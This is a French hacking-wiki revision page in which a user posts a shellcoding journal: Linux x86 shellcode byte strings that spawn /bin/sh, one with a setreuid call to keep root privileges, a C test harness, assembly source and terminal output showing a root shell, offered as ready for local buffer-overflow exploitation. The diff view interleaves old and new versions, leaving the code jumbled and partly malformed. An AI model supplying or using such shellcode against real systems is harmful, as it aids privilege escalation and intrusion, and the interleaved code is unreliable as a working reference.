« Hiteck » : différence entre les versions

De HackBBS
Aller à la navigation Aller à la recherche
Blackdevil (discussion | contributions)
Aucun résumé des modifications
Blackdevil (discussion | contributions)
Aucun résumé des modifications
 
(19 versions intermédiaires par le même utilisateur non affichées)
Ligne 1 : Ligne 1 :
<h2>Shellcoding</h2>
<p>
<p>
<b><u>Vendredi 18 juin 2010 :</u></b><br />
Enfin un vrai shellcode qui ouvre un shell c'est magnifique tout sa :-D<br /><br />


hiteck@hiteck:~/Bureau/exploits$ cat exploit.c<br />
<b><u>Mercredi 23 juin 2010</u></b>


/************************************************************************<br />
<br /><br />
* Shellcode cree par hit3ck         *<br />
* Pour tous renseignement :               *<br />
*http://wiki.hackbbs.org/index.php/Journal_intrusion_systeme_by_hit3ck  *<br />
* Disponible sur les canals de #hackbbs et #hzv *<br />
*************************************************************************/<br />


  #include <stdio.h><br />
Voila mon nouveau exploit shellcode prêt à être utilisé pour une exploitation de buffer overflow en local :-D
<br /><br />
hiteck@hiteck:~/Bureau/Programmation$ cat exploit.c<br />
  #include <stdio.h><br /><br />


char shellcode[] = "\x31\xc0\31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";<br /><br />
char shellcode[] = "\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";<br /><br />


int main(void)<br />
int main(void)<br />
{<br />
{<br />
printf("***********************\n");<br />
printf("\n[+] Exploit shellcode remote");<br />
printf("* Shellcode by hit3ck *\n");<br />
printf("\n[+] Codé par hit3ck");<br />
printf("***********************\n");<br />
fprintf(stdout,"\n[+] Taille: %d\n",strlen(shellcode));<br />
printf("*    taille : %d     *\n",sizeof(shellcode)-1);<br />
printf("***********************\n");<br />
(*(void(*)()) shellcode)();<br />
(*(void(*)()) shellcode)();<br />
}<br /><br />
}<br />
hiteck@hiteck:~/Bureau/exploits$ cat shell.s<br />
hiteck@hiteck:~/Bureau/Programmation$ ./exploit<br /><br />
main:<br />
xorl %eax,%eax<br />
xorl %edx,%edx<br />
push %edx<br />
push $0x68732f6e<br />
push $0x69622f2f<br />
mov %esp,%ebx<br />
push %edx<br />
push %ebx<br />
mov %esp,%ecx<br />
mov $11,%al<br />
int $0x80<br />
 
hiteck@hiteck:~/Bureau/exploits$ ./exploit<br />
***********************<br />
* Shellcode by hit3ck *<br />
***********************<br />
*    taille : 25      *<br />
***********************<br />
$ whoami<br />
hiteck<br />
$ echo "Shellcode reussi :-D"<br />
Shellcode reussi :-D<br />
$ exit<br />
hiteck@hiteck:~/Bureau/exploits$ <br /><br />


A la prochaine :-D
[+] Exploit shellcode remote<br />
<br /></br />
[+] Codé par hit3ck<br />
<b><u>LE shellcode est rempli de null bytes</u></b>
[+] Taille: 33<br />
# whoami<br />
root<br />
# echo "Local exploit shellcode remote :-D"<br />
Local exploit shellcode remote :-D<br />
# exit<br />
hiteck@hiteck:~/Bureau/Programmation$ <br /><br />
Attention le teste de l'exploit shellcode a eu les privilèges root au maximum, donc le programme a exploiter doit donc avoir less privilège root sinon c'est pas la peine.<br /><br />
</p>
</p>

Dernière version du 11 juin 2014 à 18:57

Mercredi 23 juin 2010

Voila mon nouveau exploit shellcode prêt à être utilisé pour une exploitation de buffer overflow en local :-D

hiteck@hiteck:~/Bureau/Programmation$ cat exploit.c
#include <stdio.h>

char shellcode[] = "\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

int main(void)
{
printf("\n[+] Exploit shellcode remote");
printf("\n[+] Codé par hit3ck");
fprintf(stdout,"\n[+] Taille: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();
}
hiteck@hiteck:~/Bureau/Programmation$ ./exploit

[+] Exploit shellcode remote
[+] Codé par hit3ck
[+] Taille: 33
# whoami
root
# echo "Local exploit shellcode remote :-D"
Local exploit shellcode remote :-D
# exit
hiteck@hiteck:~/Bureau/Programmation$

Attention le teste de l'exploit shellcode a eu les privilèges root au maximum, donc le programme a exploiter doit donc avoir less privilège root sinon c'est pas la peine.